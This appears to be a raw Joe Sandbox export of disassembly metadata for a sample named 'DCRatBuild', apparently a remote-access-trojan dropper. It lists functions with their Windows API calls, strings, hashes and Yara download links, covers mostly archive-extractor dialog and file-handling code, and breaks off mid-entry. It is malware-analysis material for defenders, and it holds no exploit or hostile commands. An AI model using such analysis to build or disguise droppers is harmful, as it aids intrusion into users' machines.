Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: bf4b2be3301dd171c64497ab186c7a5bfbcb8d0dfa60031365e5a38366b8fb76
Instruction ID: fd9200fc1dbd723d01f2f21724b758c1142ba2b817e7950994154a1abaea17f8
Opcode Fuzzy Hash: bf4b2be3301dd171c64497ab186c7a5bfbcb8d0dfa60031365e5a38366b8fb76
Instruction Fuzzy Hash: E5A012301AC0065ACA000B30CC09C1576545760702F00C6207002C00A0CB308814B500

Non-executed Functions

Function 008EB8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 008EB971
EndDialog.USER32(?,00000006), ref: 008EB984
GetDlgItem.USER32(?,0000006C), ref: 008EB9A0
SetFocus.USER32(00000000), ref: 008EB9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 008EB9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 008EBA18
FindFirstFileW.KERNEL32(?,?), ref: 008EBA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008EBA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 008EBA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 008EBA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 008EBA94
_swprintf.LIBCMT ref: 008EBAC4

Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 008EBAD7
FindClose.KERNEL32(00000000), ref: 008EBADE
_swprintf.LIBCMT ref: 008EBB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 008EBB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 008EBB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 008EBB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 008EBB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 008EBBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 008EBBC9
_swprintf.LIBCMT ref: 008EBBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 008EBC08
_swprintf.LIBCMT ref: 008EBC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 008EBC6F

Part of subcall function 008EA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 008EA662
Part of subcall function 008EA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0090E600,?,?), ref: 008EA6B1

Strings

%s %s %s, xrefs: 008EBAB2, 008EBBE7
%s %s, xrefs: 008EBB29, 008EBC4E
REPLACEFILEDLG, xrefs: 008EB907

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: ec855610cff4bc84921516e56be8d7e997df926d9bdc9c2db251b575d700522c
Instruction ID: 95d6804927cecdd7dee81581db5a8a933e9673be3960758f40019dc7ec0a0fea
Opcode Fuzzy Hash: ec855610cff4bc84921516e56be8d7e997df926d9bdc9c2db251b575d700522c
Instruction Fuzzy Hash: BF91C4B210C388BFD621DBA5DD49FFB7BACFB8A704F004819B749D2091D7719A049B62

Function 008D718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D7191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008D72F1
CloseHandle.KERNEL32(00000000), ref: 008D7301

Part of subcall function 008D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 008D7C04
Part of subcall function 008D7BF5: GetLastError.KERNEL32 ref: 008D7C4A
Part of subcall function 008D7BF5: CloseHandle.KERNEL32(?), ref: 008D7C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 008D730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 008D741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 008D7446
CloseHandle.KERNEL32(?), ref: 008D7457
GetLastError.KERNEL32 ref: 008D7467
RemoveDirectoryW.KERNEL32(?), ref: 008D74B3
DeleteFileW.KERNEL32(?), ref: 008D74DB

Strings

SeRestorePrivilege, xrefs: 008D71B2
UNC\, xrefs: 008D723C
SeCreateSymbolicLinkPrivilege, xrefs: 008D71BC
\??\, xrefs: 008D7217

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 18b61da74369e4d301b939161465c503239238ffb1f37efc4987aeb17de8db0e
Instruction ID: 35f8ca49896ad2682e0b367d3e212477e600c9b690f82cf399af291f6ab826ab
Opcode Fuzzy Hash: 18b61da74369e4d301b939161465c503239238ffb1f37efc4987aeb17de8db0e
Instruction Fuzzy Hash: 6CB1C071904219AEDF21DB64DC45BEE77B8FF04304F00466AFA49E7242EB74AA49CB61

Function 008DDA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 008DDABE

Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D

Part of subcall function 008E1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00910EE8,00000200,008DD202,00000000,?,00000050,00910EE8), ref: 008E15B3

_strlen.LIBCMT ref: 008DDADF
SetDlgItemTextW.USER32(?,0090E154,?), ref: 008DDB3F
GetWindowRect.USER32(?,?), ref: 008DDB79
GetClientRect.USER32(?,?), ref: 008DDB85
GetWindowLongW.USER32(?,000000F0), ref: 008DDC25
GetWindowRect.USER32(?,?), ref: 008DDC52
SetWindowTextW.USER32(?,?), ref: 008DDC95
GetSystemMetrics.USER32(00000008), ref: 008DDC9D
GetWindow.USER32(?,00000005), ref: 008DDCA8
GetWindowRect.USER32(00000000,?), ref: 008DDCD5
GetWindow.USER32(00000000,00000002), ref: 008DDD47

Strings

$%s:, xrefs: 008DDAB2
CAPTION, xrefs: 008DDC77
d, xrefs: 008DDBA5

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 1c970d71fc9cd9a6bc977fe566a1f15a144bda5845da8e6d50c68270dfeaef68
Instruction ID: 9be1156b72aa7d909680e60496765a340cc0816a41151fd9ef4ee6f94abaf856
Opcode Fuzzy Hash: 1c970d71fc9cd9a6bc977fe566a1f15a144bda5845da8e6d50c68270dfeaef68
Instruction Fuzzy Hash: 9F818171108301AFD710DFA8CD89A6BBBE9FB89704F044A1EFA84D3291D670E905CB52

Function 008FC233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 008FC277

Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE2F
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE41
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE53
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE65
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE77
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE89
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBE9B
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBEAD
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBEBF
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBED1
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBEE3
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBEF5
Part of subcall function 008FBE12: _free.LIBCMT ref: 008FBF07

_free.LIBCMT ref: 008FC26C

Part of subcall function 008F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?), ref: 008F84F4
Part of subcall function 008F84DE: GetLastError.KERNEL32(?,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?,?), ref: 008F8506

_free.LIBCMT ref: 008FC28E
_free.LIBCMT ref: 008FC2A3
_free.LIBCMT ref: 008FC2AE
_free.LIBCMT ref: 008FC2D0
_free.LIBCMT ref: 008FC2E3
_free.LIBCMT ref: 008FC2F1
_free.LIBCMT ref: 008FC2FC
_free.LIBCMT ref: 008FC334
_free.LIBCMT ref: 008FC33B
_free.LIBCMT ref: 008FC358
_free.LIBCMT ref: 008FC370

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b5a65756fec3791a95d1c6679a8098ed714f569e2a11efb9544326960c09951a
Instruction ID: 70c37e66a1f93f9cc8abfb285fd5b0ac136966304abe706eb95aa065a8976409
Opcode Fuzzy Hash: b5a65756fec3791a95d1c6679a8098ed714f569e2a11efb9544326960c09951a
Instruction Fuzzy Hash: 85319C3260020EDFEB20AA7CDA45B7A73E9FF00350F108869E648D7691DF31AE40CB25

Function 008ECD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 008ECD51
GetClassNameW.USER32(00000000,?,00000800), ref: 008ECD7D

Part of subcall function 008E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008DBB05,00000000,.exe,?,?,00000800,?,?,008E85DF,?), ref: 008E17C2

GetWindowLongW.USER32(00000000,000000F0), ref: 008ECD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 008ECDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 008ECDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 008ECDED
DeleteObject.GDI32(00000000), ref: 008ECDF4
GetWindow.USER32(00000000,00000002), ref: 008ECDFD

Strings

STATIC, xrefs: 008ECD83

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 911791e7fd86ed41a100f2eb6d21b16b2aaeba9c5fa7ad350c29d0cd13803ff3
Instruction ID: e158e774a6aa35c6f1a6c0ba732d7fcd29324c8b8cc41a812ff9f7e77e9dfbf1
Opcode Fuzzy Hash: 911791e7fd86ed41a100f2eb6d21b16b2aaeba9c5fa7ad350c29d0cd13803ff3
Instruction Fuzzy Hash: BB113A32A48391BBE3206B65DC09FAF365CFF42740F004020FB42E10D2CA608D169AA1

Function 008F8EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008F8EC5

Part of subcall function 008F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?), ref: 008F84F4
Part of subcall function 008F84DE: GetLastError.KERNEL32(?,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?,?), ref: 008F8506

_free.LIBCMT ref: 008F8ED1
_free.LIBCMT ref: 008F8EDC
_free.LIBCMT ref: 008F8EE7
_free.LIBCMT ref: 008F8EF2
_free.LIBCMT ref: 008F8EFD
_free.LIBCMT ref: 008F8F08
_free.LIBCMT ref: 008F8F13
_free.LIBCMT ref: 008F8F1E
_free.LIBCMT ref: 008F8F2C

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7a37847253f4140458d0316212d65ad204ace28ce0e023c2509eea0ad7091256
Instruction ID: de11c4aea524d11cd78e13008af5c8d6e3fdc2d01877c2d19f1da4c0b81ecbc0
Opcode Fuzzy Hash: 7a37847253f4140458d0316212d65ad204ace28ce0e023c2509eea0ad7091256
Instruction Fuzzy Hash: 5D11A27650010DFFCB11EFA8C842CEA3BA5FF14350B5180E5BA088B666DA31EA51DF86

Function 008D2162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

xc%u, xrefs: 008D26D7
;%u, xrefs: 008D2497
x%u, xrefs: 008D267A

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: d14f16d2cc620785cd5de5e9719ea099763d6b24584864c3807ea57d2fd001df
Instruction ID: 7436ab1e9057c09490dcc26a4e0531a9efc488414634cd2c7e8349b264654e6f
Opcode Fuzzy Hash: d14f16d2cc620785cd5de5e9719ea099763d6b24584864c3807ea57d2fd001df
Instruction Fuzzy Hash: F8F1D4716082455BDB25EF288895BEA7799FFB0300F08476FF985CB383DA64D944C7A2

Function 008EACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365

EndDialog.USER32(?,00000001), ref: 008EAD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 008EAD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 008EAD60
SetWindowTextW.USER32(?,?), ref: 008EAD71
GetDlgItem.USER32(?,00000065), ref: 008EAD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 008EAD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 008EADA4

Strings

LICENSEDLG, xrefs: 008EACE4

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 95aef913b60c80b599af661fbe809ad3c5f4d8a08bcaa2736c36237a3dcbce63
Instruction ID: c605b0ab5e37a7cf89d81c9ddbd10ccf72e746da5d7bb1c5aa10b17b5818382e
Opcode Fuzzy Hash: 95aef913b60c80b599af661fbe809ad3c5f4d8a08bcaa2736c36237a3dcbce63
Instruction Fuzzy Hash: E221D631758144BBD2295F76ED49E7B3B6CFB4BF46F014014F644E25A0CB626901FA32

Function 008D9443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D9448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008D946B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008D948A

Part of subcall function 008E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008DBB05,00000000,.exe,?,?,00000800,?,?,008E85DF,?), ref: 008E17C2

_swprintf.LIBCMT ref: 008D9526

Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D

MoveFileW.KERNEL32(?,?), ref: 008D9595
MoveFileW.KERNEL32(?,?), ref: 008D95D5

Strings

rtmp%d, xrefs: 008D950F

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: fbade0f1ec1c6ab4455066d2077a6b108da4dc3f893eee7d14a2afe6a91a3e40
Instruction ID: dde74769593e5d6302660de64d0dcc98fbf60f01645d49966684180a87897ded
Opcode Fuzzy Hash: fbade0f1ec1c6ab4455066d2077a6b108da4dc3f893eee7d14a2afe6a91a3e40
Instruction Fuzzy Hash: 23414F71900259A6CF20EB64DC85EDA737CFF15780F0046E6F589E3242EB74CB889B65

Function 008E0A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 008E0A9D

Part of subcall function 008DACF5: GetVersionExW.KERNEL32(?), ref: 008DAD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 008E0AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 008E0AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 008E0AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 008E0AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 008E0B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 008E0B3D
__aullrem.LIBCMT ref: 008E0BCB

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: a91bc5a6209c317d147252691f6f2700a646d296bdaac916110c9d7a0410932e
Instruction ID: a164c35b9c8a249caa89ac973615131126bba68e7accd724152a3d1584ea58a9
Opcode Fuzzy Hash: a91bc5a6209c317d147252691f6f2700a646d296bdaac916110c9d7a0410932e
Instruction Fuzzy Hash: 5C4127B1408346AFC310DF65C88096BBBF8FB88714F004E2EF596D2650E778E589DB52

Function 008FEE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,008FF5A2,?,00000000,?,00000000,00000000), ref: 008FEE6F
__fassign.LIBCMT ref: 008FEEEA
__fassign.LIBCMT ref: 008FEF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 008FEF2B
WriteFile.KERNEL32(?,?,00000000,008FF5A2,00000000,?,?,?,?,?,?,?,?,?,008FF5A2,?), ref: 008FEF4A
WriteFile.KERNEL32(?,?,00000001,008FF5A2,00000000,?,?,?,?,?,?,?,?,?,008FF5A2,?), ref: 008FEF83

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e596d84ef336cb89093cd2c3a7f2ec13f4fe52b875e91d7387aaaf90c520fb10
Instruction ID: 366a49d01929a76e1d2771af6a495d36ec1344ac03646a9fabe57d38e6acbab1
Opcode Fuzzy Hash: e596d84ef336cb89093cd2c3a7f2ec13f4fe52b875e91d7387aaaf90c520fb10
Instruction Fuzzy Hash: EE519171A0424D9FDB10CFA8D845AFEBBB9FF09310F14455AEA55E72A1DA309A40CB61

Function 008EC534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 008EC54A
_swprintf.LIBCMT ref: 008EC57E

Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D

SetDlgItemTextW.USER32(?,00000066,0091946A), ref: 008EC59E
_wcschr.LIBVCRUNTIME ref: 008EC5D1
EndDialog.USER32(?,00000001), ref: 008EC6B2

Strings

%s%s%u, xrefs: 008EC573

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
